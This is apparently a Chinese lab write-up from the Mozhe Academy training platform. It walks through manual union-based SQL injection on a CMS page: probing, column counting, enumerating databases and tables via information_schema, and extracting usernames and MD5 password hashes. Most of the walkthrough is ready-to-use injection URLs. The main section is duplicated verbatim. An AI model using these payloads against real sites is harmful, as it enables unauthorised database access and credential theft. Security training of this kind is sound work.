墨者學院-SQL手工注入漏洞測試(MySQL資料庫)
此題很簡單,可以完全參照
https://blog.csdn.net/qq_42357070/article/details/81215715
進行解題
以下用cms站點舉例:
https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ
提交and 1=1 返回內容正常
And 1=2 返回內容為空
確定存在注入漏洞且為數字型
通過sql語句中的order by N逐個嘗試,返回內容正常,可以確定欄位少15個
http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15
通過SQL語句中and 1=2 union select 1,2,3……,n聯合查詢,判斷顯示的是哪些欄位,就是原本顯示標題和內容時候的查詢欄位,title標題是第2個位置顯示,contents內容是在
第3個位置顯示。
http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,DATABASE(),4,5,6,7,8,9,10,VERSION(),12,13,14,15
在原來的標題上位置顯示為資料庫名稱cms,內容的位置顯示為5.5.53資料庫版本號。
這裡是這2個內容分別顯示在第2、3的位置
http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,SCHEMA_NAME,4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.SCHEMATA%20limit%200,1
查詢資料庫報錯。
illegal mix of collations for operation 'UNION'
找到解決方法是:convert(#需求# using latin1)
http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(SCHEMA_NAME%20using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.SCHEMATA%20limit%200,1
重複操作得到以下七個資料庫:
cmc,information_schema,mysql,zzcms,test,performance_shema,dvwa
進入cms資料庫下找到當前資料庫使用者資訊表
http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(TABLE_NAME%20using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=%27cms%27%20limit%207,1
重複操作得到cms_users的三個欄位及字元型
userid,username,password
查詢資料庫cms的表cms_users中資料的userid,username,password的內容,
三者之間用-連線起來,CONCAT的是把產生的字串連線起來,這個地方拼接在一起時為了在一個地方全部顯示出來。可以獲得兩個使用者及密碼(md5加密後的密碼,可通過解密獲到明文)
提交and 1=1 返回內容正常
And 1=2 返回內容為空
確定存在注入漏洞且為數字型
通過sql語句中的order by N逐個嘗試,返回內容正常,可以確定欄位少15個
http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15
通過SQL語句中and 1=2 union select 1,2,3……,n聯合查詢,判斷顯示的是哪些欄位,就是原本顯示標題和內容時候的查詢欄位,title標題是第2個位置顯示,contents內容是在
第3個位置顯示。
http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,DATABASE(),4,5,6,7,8,9,10,VERSION(),12,13,14,15
在原來的標題上位置顯示為資料庫名稱cms,內容的位置顯示為5.5.53資料庫版本號。
這裡是這2個內容分別顯示在第2、3的位置
http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,SCHEMA_NAME,4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.SCHEMATA%20limit%200,1
查詢資料庫報錯。
找到解決方法是:convert(#需求# using latin1)
http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(SCHEMA_NAME%20using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.SCHEMATA%20limit%200,1
重複操作得到以下七個資料庫:
cmc,information_schema,mysql,zzcms,test,performance_shema,dvwa
進入cms資料庫下找到當前資料庫使用者資訊表
http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(TABLE_NAME%20using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=%27cms%27%20limit%207,1
重複操作得到cms_users的三個欄位及字元型
userid,username,password
查詢資料庫cms的表cms_users中資料的userid,username,password的內容,
三者之間用-連線起來,CONCAT的是把產生的字串連線起來,這個地方拼接在一起時為了在一個地方全部顯示出來。可以獲得兩個使用者及密碼(md5加密後的密碼,可通過解密獲到明文)
盲注是真的煎熬,,,嚶嚶嚶。。。
盲注是真的煎熬,,,嚶嚶嚶。。。
相關文章
- 墨者學院WebShell檔案上傳漏洞分析溯源Webshell
- 建立一個SQL測試資料庫 - 消費者資料庫SQL資料庫
- 【MySQL】資料庫效能測試MySql資料庫
- SQL MAP 注入測試SQL
- 【恩墨學院】原來銀行都在用這些資料庫資料庫
- MySQL資料庫注入基礎MySql資料庫
- Go 單元測試之Mysql資料庫整合測試GoMySql資料庫
- 【資料庫學習】資料庫平臺:mysql,sql server資料庫MySqlServer
- 【Mysql】資料庫索引,百萬資料測試索引效果MySql資料庫索引
- 【恩墨學院】恩墨學院獲得Oracle WDP全國授權Oracle
- MySQL製作具有千萬條測試資料的測試庫MySql
- mysql之 mysql資料庫壓力測試工具(mysqlslap)MySql資料庫
- 用 NSURProtocol 注入測試資料Protocol
- 【恩墨學院】Oracle DG測試failover和後續恢復報告OracleAI
- MySQL 資料庫生成 10000 條測試資料MySql資料庫
- 邏輯注入漏洞滲透測試檢測辦法
- 【恩墨學院】基於裸資料的異地資料庫效能診斷與最佳化資料庫
- 前幾天手工刪除測試資料庫並重建的指令碼資料庫指令碼
- 【恩墨學院】如何理解並正確使用MySql索引MySql索引
- mysql資料庫xtrabackup壓縮備份測試MySql資料庫
- mysql資料庫索引的建立以及效能測試MySql資料庫索引
- 手工建立資料庫資料庫
- PHP+MySQL 手工注入語句大全PHPMySql
- 【恩墨學院】美團點評資料庫高可用架構的演進與設想資料庫架構
- 大資料測試與 傳統資料庫測試大資料資料庫
- 【C/C++學院】(21)Mysql資料庫程式設計–開發簡介/SQL語句C++MySql資料庫程式設計
- Sql Server生成測試資料SQLServer
- mysql之 sysbench0.4.12資料庫效能測試MySql資料庫
- 資料庫測試指南資料庫
- 程式碼安全測試第十二期:LDAP注入漏洞LDA
- 網站漏洞檢測 wordpress sql注入漏洞程式碼審計與修復網站SQL
- 手工命令建立資料庫資料庫
- Oracle 手工建立資料庫Oracle資料庫
- 手工建立oracle資料庫Oracle資料庫
- MySQL構造測試資料MySql
- MySQL - [06] 海賊王測試資料MySql
- MYSQL資料庫------SQL優化MySql資料庫優化
- DC學院學習筆記(六):資料庫和SQL語言簡述筆記資料庫SQL